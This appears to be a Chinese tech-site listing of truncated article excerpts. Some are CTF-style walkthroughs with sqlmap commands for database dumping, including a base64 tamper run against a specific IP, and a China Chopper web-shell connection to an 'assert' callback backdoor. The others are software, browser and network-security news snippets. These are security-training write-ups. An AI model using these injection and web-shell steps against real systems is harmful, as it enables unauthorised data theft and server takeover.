IT2021科技站

打开页面发现是一个图片，图片当中有一段代码 仔细分析一下，分析如下： 函数Extract：将数组中的键名设置位变量名，键值为变量中的参数，例如有一个数组 $a = arry(“a”=>”111”,”b”=>”222”); 那么经过extract函数处理后如下： Extract($a); 输出的结果就是： $a=”111”,$b=”222”   再看下面的代码 If判断，$a的值，...

1.首先打开burp抓包，添加x-forwarded-for:*，将raw的信息存为txt文件，如下图所示 2.爆出当前的数据库 sqlmap -r 1.txt --current-db --batch 3.爆表名 sqlmap -r 1.txt -D webcalendar -T user --columns --batch 4.爆表中的字段 sqlmap -r 1.txt -D webcalendar -T us...

找到该文件，经典的回调函数形式 菜刀连接， ip/www/Exception.php?POST=assert  密码为assert 得到key  

两种解法 一、利用sqlmap及其tamper模块base64encode使用 1. 看到id后面的参数可能是base64加密后的结果，我们尝试解密，解密结果为1 2.查看当前的系统信息 sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode 3.暴库 sqlmap -u "http://219.153.49.228...

FileZilla 3.41 中文版 + Portable 免费开源的 FTP 软件由大眼仔旭（www.dayanzai.me）发布。免费开源的FTP解决方案 FileZilla 中文版是一种快速、可信赖的FTP客户端以及服务器端开放源代码程式，具有多种特色、直觉的接口。可控性、有条理的界面和管理多站点的简化方式使得 Filezilla 客户端版成为一个方便高效的FTP客户端工具。FlashFXP 也是一款非常经典优...

Wireshark（前称Ethereal）是一个网络数据包分析软件。网络数据包分析软件的功能是截取网络数据包，并尽可能显示出最为详细的网络数据包数据。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。

知名广告屏蔽插件uBO 的开发者最近发现谷歌浏览器开发团队准备使用新的API接口替换旧的网络请求接口。 还未正式推出的新接口实际上相较于旧接口其功能被弱化，并且可能会限制广告屏蔽插件使用的过滤规则数。 当前广告屏蔽插件主要使用阻止请求的方式禁止广告加载，规则方面主要使用ABP插件维护的广告请求地址。 据蓝点网统计目前最新的广告过滤规则包含注释在内共89223条，这个规则由维护者不断更新增加或删减等。 谷歌浏览器新AP...

最近在折腾Kali Linux 顺便做一简单整理，至于安装就不再多扯了，估计会出现的问题上一篇文章《VMware虚拟机安装Kali Linux 遇到的问题》也有提到，包括Kali Linux和VMware Workstation 10 下载链接都有提供。 Kali Linux下载链接：http://mirrors.ustc.edu.cn/kali-images/kali-2016.2/ （ps：建议用国内镜像源下载，...

阿里巴巴集团高级安全专家程荣在2018 ISC互联网安全大会上分享了阿里云IPv6的实践。在演讲中，程荣讲述了全球IPv6发展趋势及国内政策要求，分享了阿里巴巴集团IPv6升级面临的挑战和安全威胁，以及阿里巴巴集团IPv6改造和安全解决方案。 阿里巴巴IPv6升级面临的挑战及安全威胁 程荣提到，阿里巴巴的整个业务生态在落实国家IPv6政策的实践过程中，碰到了一些问题，一是在IPv6规模化部署的情况下做好IPv6安全，...